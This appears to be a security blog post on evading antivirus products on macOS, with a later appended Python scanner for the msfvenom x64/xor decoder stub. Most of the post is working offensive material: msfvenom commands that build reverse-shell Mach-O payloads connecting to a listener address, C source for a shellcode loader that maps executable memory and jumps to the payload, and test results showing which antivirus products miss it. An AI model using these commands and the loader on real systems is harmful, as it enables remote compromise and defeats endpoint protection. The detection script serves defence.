A few months ago I did some research on antivirus (evasion) on OSX and now I decided to write a blog post about it.
Scope
* build executables that are not recognized by antivirus software on Mac OSX
* for building Mac OSX executables you need Mac OSX
* shellcode/payload generated with MSF
* developed in C and some assembly
* main focus is learning and automation
Why?
Some high-profile targets use OSX… so AV might be a thing.
Dmitry Medvedev:
http://obamapacman.com/2009/08/russia-president-dmitry-medvedev-mac-user-kremlin/
As do some security researchers 😉
Charlie Miller:
Targeted Malware
… or like APT 28:
Bitdefender whitepaper: Bitdefender-Whitepaper-APT-Mac-A4-en-EN-web.pdf
Test Cases and PoCs
* eicar
* msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 -a x64 --platform OSX -e x64/xor -f macho -o osx64_reverse_xor.out
* msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 -a x64 --platform OSX -f macho -o osx64_reverse.out
* msfvenom -p osx/x86/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 --platform OSX -f macho -o osx86_reverse.out
* gcc -o osx64_sc_binder.out osx64_sc_binder.c
osx64_sc_binder.c
#include <string.h>
#include <sys/mman.h>

/* msfvenom payload; the listing is shortened here, the full buffer is in the repository */
unsigned char buf[] =
"\x48\x31\xc9\x48\x81\xe9\xf2\xff\xff\xff\x48\x8d\x05\xef\xff"
...
"\x15";

int main(int argc, char **argv)
{
    /* anonymous page mapped readable, writable and executable */
    void *ptr = mmap(0, 0x1000, PROT_WRITE|PROT_READ|PROT_EXEC, MAP_ANON | MAP_PRIVATE, -1, 0);
    /* copy the payload into the page and jump to it */
    memcpy(ptr, buf, sizeof buf);
    void (*fp)() = (void (*)())ptr;
    fp();
    return 0;
}
And then some testing…
Comodo
… found nothing, only eicar.
Sophos
Recognized as malicious:
msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 -a x64 --platform OSX -e x64/xor -f macho -o a.out
Not recognized: osx64_sc_binder.c
Avast
Recognized as malicious:
msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 -a x64 --platform OSX -e x64/xor -f macho -o a.out
Not recognized: osx64_sc_binder.c
Avira
Not recognized:
msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 -a x64 --platform OSX -e x64/xor -f macho -o a.out
… no further testing.
Finally
As can be seen, not much effort is needed to evade AV software on Mac OSX: the shellcode binder was enough to evade all tested products.
The binder: https://github.com/govolution/avepoc/blob/master/osx64_sc_binder.c
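The results above (the encoded msfvenom Mach-O flagged, the binder carrying the same payload bytes not) point at signatures tied to the msfvenom container rather than to the payload. As an added example, not part of the original post or of the avepoc/avetosx repositories, here is a small Python check that matches the x64/xor decoder-stub prefix shown in the binder's buffer wherever it sits in a file; it assumes the sub rcx immediate is the block count (so it is wildcarded) and completes the lea rel32 to ef ff ff ff, which the page's listing truncates after ef ff.

```python
import re

# Prefix of the msfvenom x64/xor decoder stub as listed in the binder's buffer.
# The sub rcx,imm32 immediate is the negative count of 8-byte blocks and so
# changes with payload length; it is wildcarded (assumption about the encoder):
#   48 31 c9              xor rcx, rcx
#   48 81 e9 ?? ?? ?? ??  sub rcx, imm32
#   48 8d 05 ef ff ff ff  lea rax, [rip-0x11]
XOR_STUB = re.compile(
    rb"\x48\x31\xc9\x48\x81\xe9.{4}\x48\x8d\x05\xef\xff\xff\xff", re.DOTALL)

# 64-bit Mach-O (both byte orders) and fat-binary magics at file offset 0.
MACHO_MAGICS = (b"\xcf\xfa\xed\xfe", b"\xfe\xed\xfa\xcf", b"\xca\xfe\xba\xbe")

def find_xor_stub(data: bytes) -> list:
    """Return every offset at which the decoder stub occurs in data."""
    return [m.start() for m in XOR_STUB.finditer(data)]

def scan(data: bytes) -> dict:
    """Container-independent check: the stub is flagged whether it is the
    msfvenom-generated Mach-O itself or a buffer inside a custom C loader."""
    offsets = find_xor_stub(data)
    return {
        "macho": data[:4] in MACHO_MAGICS,
        "stub_offsets": offsets,
        "verdict": "x64/xor decoder stub present" if offsets else "clean",
    }

def scan_file(path: str) -> dict:
    with open(path, "rb") as fh:
        return scan(fh.read())

# Constructed samples, not real binaries: the stub with the page's block count
# (-14 = 0xfffffff2) at offset 0; the stub with another count (-40 = 0xffffffd8)
# placed after a fake Mach-O header and import strings; and a benign buffer.
STUB_14 = bytes.fromhex("4831c94881e9f2ffffff488d05efffffff")
STUB_40 = bytes.fromhex("4831c94881e9d8ffffff488d05efffffff")
SAMPLE_RAW = STUB_14 + b"\x48\xbb" + bytes(8) + b"\x90" * 32
SAMPLE_LOADER = (b"\xcf\xfa\xed\xfe" + bytes(60) + b"_mmap\x00_memcpy\x00"
                 + STUB_40 + b"\xcc" * 16)
SAMPLE_BENIGN = bytes(range(256))

if __name__ == "__main__":
    for name, sample in (("raw", SAMPLE_RAW), ("loader", SAMPLE_LOADER),
                         ("benign", SAMPLE_BENIGN)):
        print(name, scan(sample))
```

The same wildcard pattern can be carried over into a YARA rule for scanning at scale.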
Nevertheless I made a small PoC version of AVET (based on the old version 1.3) for OSX (https://github.com/govolution/avetosx):
Maybe I will try to integrate it in AVET 2 some time.